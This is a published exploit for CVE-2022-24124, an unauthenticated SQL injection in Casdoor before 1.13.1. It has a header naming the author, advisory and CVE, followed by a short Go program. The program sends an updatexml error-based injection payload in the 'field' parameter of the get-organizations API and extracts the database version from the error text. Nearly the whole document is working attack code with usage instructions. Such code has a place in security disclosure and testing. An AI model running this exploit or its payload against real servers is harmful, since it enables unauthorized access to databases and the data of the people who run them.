Casdoor 1.13.0 SQL Injection

`// Exploit Title: Casdoor 1.13.0 SQL Injection (Unauthenticated)   
// Date: 2022-02-25  
// Exploit Author: Mayank Deshmukh  
// Vendor Homepage: https://casdoor.org/  
// Software Link: https://github.com/casdoor/casdoor/releases/tag/v1.13.0  
// Version: version < 1.13.1  
// Security Advisory: https://github.com/advisories/GHSA-m358-g4rp-533r  
// Tested on: Kali Linux  
// CVE : CVE-2022-24124  
// Github POC: https://github.com/ColdFusionX/CVE-2022-24124  
  
// Exploit Usage : go run exploit.go -u http://127.0.0.1:8080  
  
package main  
  
import (  
"flag"  
"fmt"  
"html"  
"io/ioutil"  
"net/http"  
"os"  
"regexp"  
"strings"  
)  
  
func main() {  
var url string  
flag.StringVar(&url, "u", "", "Casdoor URL (ex. http://127.0.0.1:8080)")  
flag.Parse()  
  
banner := `  
-=Casdoor SQL Injection (CVE-2022-24124)=-   
- by Mayank Deshmukh (ColdFusionX)  
  
`  
fmt.Printf(banner)  
fmt.Println("[*] Dumping Database Version")  
response, err := http.Get(url + "/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(null,version(),null)")  
  
if err != nil {  
panic(err)  
}  
  
defer response.Body.Close()  
  
databytes, err := ioutil.ReadAll(response.Body)  
  
if err != nil {  
panic(err)  
}  
  
content := string(databytes)  
  
re := regexp.MustCompile("(?i)(XPATH syntax error.*&#39)")  
  
result := re.FindAllString(content, -1)  
  
sqliop := fmt.Sprint(result)  
replacer := strings.NewReplacer("[", "", "]", "", "&#39", "", ";", "")  
  
finalop := replacer.Replace(sqliop)  
fmt.Println(html.UnescapeString(finalop))  
  
  
if result == nil {  
fmt.Printf("Application not vulnerable\n")  
os.Exit(1)  
}  
  
}  
`